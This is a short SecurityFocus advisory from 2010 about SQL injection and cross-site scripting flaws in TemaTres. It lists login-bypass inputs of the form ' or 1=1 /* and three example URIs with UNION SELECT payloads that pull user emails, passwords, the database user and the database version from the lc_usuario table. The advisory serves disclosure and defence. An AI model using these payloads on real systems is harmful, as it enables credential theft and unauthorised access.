TemaTres SQL Injection and Cross Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example data is available:

mail:' or 1=1 /*
password: Nothing

mail: Something
password:' or 1=1 /*

The following example URIs are available:

http://www.example.com/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*

http://www.example.com/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*

http://www.example.com/[HOME_PATH]/sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*&y=2007

The following exploit code and example URIs are available:


 

Privacy Statement
Copyright 2010, SecurityFocus